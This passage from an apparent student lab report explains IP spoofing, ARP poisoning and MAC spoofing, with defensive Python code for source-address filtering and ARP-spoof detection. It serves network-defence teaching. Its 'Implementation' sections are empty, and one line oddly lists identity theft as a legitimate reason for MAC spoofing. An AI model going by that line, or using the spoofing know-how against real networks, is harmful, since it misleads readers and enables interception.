which looks at IP packets exiting the network, ensuring that those packets carry source addresses belonging
to the network, to prevent someone within the network from launching an outbound attack using IP spoofing.
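An ingress/egress filter in the BCP 38 sense, as an added example written for this report (not code from the original experiment or from any router vendor). Each customer-facing interface is bound to the prefixes legitimately behind it, and a packet whose source does not belong to its interface is dropped (strict reverse-path filtering); on the upstream interface the rule is the mirror image, so nothing claiming one of our own addresses, or an address from bogon space, is accepted from the Internet. The interface names, prefixes and sample packets are constructed.

```python
import ipaddress

# Address space that must never appear as a source on the Internet-facing side.
BOGONS = [ipaddress.ip_network(p) for p in (
    "0.0.0.0/8", "10.0.0.0/8", "100.64.0.0/10", "127.0.0.0/8",
    "169.254.0.0/16", "172.16.0.0/12", "192.168.0.0/16", "224.0.0.0/3")]


class EdgeFilter:
    """BCP 38 / RFC 2827 style source-address validation on an edge router.
    Every customer-facing interface is bound to the prefixes legitimately behind
    it; a packet whose source is not in its interface's prefixes is dropped
    (strict reverse-path filtering).  On the upstream interface the rule is the
    mirror image: sources belonging to us, or to bogon space, cannot be genuine."""

    def __init__(self, upstream, iface_prefixes):
        self.upstream = upstream
        self.prefixes = {i: [ipaddress.ip_network(p) for p in ps]
                         for i, ps in iface_prefixes.items()}

    def _owned(self, src):
        return any(src in n for nets in self.prefixes.values() for n in nets)

    def check(self, iface, src):
        src = ipaddress.ip_address(src)
        if iface == self.upstream:
            if self._owned(src):
                return "drop: inbound packet claims one of our own addresses"
            if any(src in n for n in BOGONS):
                return "drop: bogon source"
            return "accept"
        if any(src in n for n in self.prefixes.get(iface, [])):
            return "accept"
        return f"drop: {src} is not valid on {iface} (spoofed or misrouted)"


if __name__ == "__main__":
    edge = EdgeFilter("eth0", {"eth1": ["203.0.113.0/24"], "eth2": ["198.51.100.0/25"]})
    samples = [("eth1", "203.0.113.7"),      # customer using its own address
               ("eth1", "198.51.100.9"),     # customer spoofing a neighbour's prefix
               ("eth1", "8.8.8.8"),          # customer spoofing an Internet address
               ("eth0", "203.0.113.7"),      # outsider claiming our address
               ("eth0", "10.1.2.3"),         # bogon from the Internet
               ("eth0", "93.184.216.34")]    # ordinary inbound packet
    for iface, src in samples:
        print(f"{iface:5} {src:16} {edge.check(iface, src)}")
```

Strict mode is what makes the egress rule bite: a bot inside the customer network cannot emit a packet with a spoofed source, so it cannot take part in a reflection attack. On interfaces with asymmetric routing, routers fall back to "loose" uRPF (the source merely has to exist in the routing table), which stops bogons but not spoofing of routable addresses.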
Implementation
7) ARP Poisoning
Address Resolution Protocol (ARP) is a protocol that enables network communications to reach a specific
device on the network. ARP translates Internet Protocol (IP) addresses to a Media Access Control (MAC)
address, and vice versa. Most commonly, devices use ARP to contact the router or gateway that enables
them to connect to the Internet.
Hosts maintain an ARP cache, a mapping table between IP addresses and MAC addresses, and use it to
connect to destinations on the network. If the host doesn’t know the MAC address for a certain IP
address, it sends out an ARP request packet, asking other machines on the network for the matching MAC
address.
The ARP protocol was not designed for security, so it does not verify that a response to an ARP request
really comes from an authorized party. It also lets hosts accept ARP responses even if they never sent out
a request. This is a weak point in the ARP protocol, which opens the door to ARP spoofing attacks.
ARP only works with 32-bit IPv4 addresses. IPv6 uses a different protocol, Neighbor Discovery Protocol
(NDP), which is just as unauthenticated by default; its secured variant, SEND (Secure Neighbor Discovery),
uses cryptographically generated addresses to verify host identities but is rarely deployed. Since most
local networks still use IPv4, ARP remains in wide use.
ARP Spoofing Prevention
Here are a few best practices that can help you prevent ARP Spoofing on your network:
Use a Virtual Private Network (VPN)—a VPN allows devices to connect to the Internet through an
encrypted tunnel. An ARP spoofing attacker on the local network can still intercept or drop the packets,
but cannot read or modify the tunnelled traffic, which removes most of the value of the attack.
Use static ARP—the ARP protocol lets you define a static ARP entry for an IP address, and prevent
devices from listening on ARP responses for that address. For example, if a workstation always connects
to the same router, you can define a static ARP entry for that router, preventing an attack.
Use packet filtering—packet filtering solutions, such as dynamic ARP inspection on managed switches,
identify poisoned ARP packets by checking them against known IP-to-MAC bindings (for example those
learned by DHCP snooping) and by seeing that they contain conflicting source information, and stop
them before they reach devices on your network.
Run a spoofing attack—check if your existing defenses are working by mounting a spoofing attack, in
coordination with IT and security teams. If the attack succeeds, identify weak points in your defensive
measures and remediate them.
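A passive monitor that raises the "conflicting source information" alerts the prevention section talks about, as an added example written for this report (not code from the original experiment or from any inspection product). It parses raw Ethernet+ARP frames and flags three things: a reply whose ARP sender MAC differs from the Ethernet source MAC, a reply that answers no request seen on the wire (ARP caches accept these anyway, which is exactly what ettercap relies on), and an IP whose mapping changes from what was learned or statically pinned for the gateway. The MAC and IP addresses and the frame sequence are constructed.

```python
import struct

ETH_P_ARP = 0x0806
BROADCAST = b"\xff" * 6


def build_arp(oper, sender_mac, sender_ip, target_mac, target_ip, eth_src=None):
    """Constructed Ethernet II + ARP frame (RFC 826).  oper 1 = request, 2 = reply.
    eth_src lets the demo send a frame whose Ethernet source differs from the ARP
    sender MAC, one of the inconsistencies a filter can look for."""
    eth_dst = BROADCAST if oper == 1 else target_mac
    eth = eth_dst + (eth_src or sender_mac) + struct.pack("!H", ETH_P_ARP)
    arp = struct.pack("!HHBBH6s4s6s4s", 1, 0x0800, 6, 4, oper,
                      sender_mac, sender_ip, target_mac, target_ip)
    return eth + arp


def parse_arp(frame):
    if len(frame) < 42 or struct.unpack("!H", frame[12:14])[0] != ETH_P_ARP:
        return None
    _, _, _, _, oper, smac, sip, tmac, tip = struct.unpack("!HHBBH6s4s6s4s", frame[14:42])
    return {"eth_src": frame[6:12], "oper": oper, "smac": smac, "sip": sip, "tmac": tmac, "tip": tip}


def fmt_mac(b):
    return ":".join(f"{x:02x}" for x in b)


def fmt_ip(b):
    return ".".join(str(x) for x in b)


class ArpWatch:
    """Passive ARP monitor.  Alerts on the 'conflicting source information' the
    text mentions: a reply whose ARP sender MAC differs from the Ethernet source,
    a reply nobody asked for (caches accept these anyway), and an IP whose MAC
    mapping changes from what was learned or statically pinned."""

    def __init__(self, static=None):
        self.static = dict(static or {})   # ip -> mac, never overwritten by learning
        self.learned = {}                  # ip -> mac, learned from solicited replies
        self.pending = set()               # (requester mac, ip asked for)

    def observe(self, frame):
        a = parse_arp(frame)
        if a is None:
            return []
        if a["oper"] == 1:                 # request: remember who asked for what
            self.pending.add((a["smac"], a["tip"]))
            return []
        ip, mac, alerts = a["sip"], a["smac"], []
        who = fmt_ip(ip)
        if mac != a["eth_src"]:
            alerts.append(f"{who}: ARP sender {fmt_mac(mac)} != frame source {fmt_mac(a['eth_src'])}")
        if (a["tmac"], ip) in self.pending:
            self.pending.discard((a["tmac"], ip))
        else:
            alerts.append(f"{who}: unsolicited reply claiming {fmt_mac(mac)}")
        expected = self.static.get(ip, self.learned.get(ip))
        if expected is not None and expected != mac:
            alerts.append(f"{who}: mapping changed {fmt_mac(expected)} -> {fmt_mac(mac)}")
        if ip not in self.static:
            self.learned[ip] = mac
        return alerts


if __name__ == "__main__":
    gw_mac, victim_mac, attacker_mac = (bytes.fromhex(h) for h in
                                        ("001122334455", "66778899aabb", "ccddeeff0011"))
    gw_ip, victim_ip = bytes([192, 168, 0, 1]), bytes([192, 168, 0, 104])
    watch = ArpWatch(static={gw_ip: gw_mac})      # pin the gateway, as the text advises
    frames = [
        build_arp(1, victim_mac, victim_ip, b"\0" * 6, gw_ip),    # victim asks for the gateway
        build_arp(2, gw_mac, gw_ip, victim_mac, victim_ip),        # genuine answer
        build_arp(2, attacker_mac, gw_ip, victim_mac, victim_ip),  # ettercap-style poison
    ]
    for f in frames:
        for alert in watch.observe(f):
            print("ALERT", alert)
```

The unsolicited-reply rule is noisy on real networks (hosts send gratuitous ARP when they boot or fail over), so in practice it is logged rather than blocked, while a mapping change for a pinned gateway is worth an immediate alert.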
Implementation
8) MAC Spoofing
MAC address spoofing is a method for changing or masking the factory-assigned MAC address of a network
interface on a device; on most operating systems it is a one-line configuration change.
Theoretically, every network device in the world is identified by a MAC address. But not every user
wants this transparency on the internet. One reason to mask your MAC address is for the protection of
privacy – for example, in public WLAN networks. This legitimate use of MAC spoofing is in opposition
to the illegal activities, where users change MAC addresses to circumvent access restrictions and security
measures or imitate the identity of another network device.
Legitimate reasons
1. Anonymization
2. Identity theft (taking over the registered address of a device that is being replaced)
3. License terms (software or services tied to a particular MAC address)
The most common reason to change or spoof a MAC address is privacy. When you connect to a public
network, your MAC address is exposed to that network and can be used to recognise the device across
visits. Spoofing or randomizing the MAC address keeps the hardware identity unexposed, so it is
recommended to use a spoofed or randomized MAC address when connecting to public networks.
Prevention
Spoofing a MAC address does not hide the traffic from the network, so a network manager can still
scrutinize the traffic sent from the spoofed MAC address. A spoofed address typically shows up as traffic
from two different sources concurrently (the same MAC seen on two switch ports, or with two IP addresses),
or as a company device apparently connected from a different physical location on the network. It is also
important to harden switches, access points and individual machines against MAC spoofing, for example
with port security that limits the MAC addresses allowed per port and with 802.1X authentication instead
of MAC-based access control, since a MAC allow-list is exactly what spoofing defeats.
One can also firewall, or run a service built specifically to detect MAC spoofing. Tools that help detect
it include ARP/RARP monitoring, traffic analyzers, and bandwidth monitors.
Implementation
Implementation (Method 2) : CLI
Conclusion
Thus, in this experiment, we learned about various cyber attacks on different layers of TCP/IP model and
successfully demonstrated HTTP Flood Attack, DNS Cache Poisoning, SYN Flood Attack, TCP Session
Hijacking, DHCP Spoofing, IP Spoofing, ARP Poisoning and MAC Spoofing.
Resources
1. https://pentera.io/blog/dhcp-spoofing-101/
2. https://howdoesinternetwork.com/2012/prevent-dhcp-server-spoofing
3. https://www.cloudflare.com/en-gb/learning/ddos/glossary/ip-spoofing/
4. https://www.imperva.com/learn/application-security/arp-spoofing/
5. https://www.ionos.com/digitalguide/server/know-how/what-is-mac-spoofing/
6. https://www.linuxfordevices.com/tutorials/ubuntu/spoof-mac-address
7. https://security.stackexchange.com/questions/225985/is-there-any-point-of-arp-spoofing-on-a-wifi-network
8. https://linuxhint.com/arp_spoofing_using_man_in_the_middle_attack/
9. https://medium.com/@ayushir/dhcp-snooping-attack-ca728e4dd84
10. https://www.geeksforgeeks.org/virtual-private-network-vpn-setup-in-kali-linux/
11. https://www.interviewbit.com/blog/nmap-commands/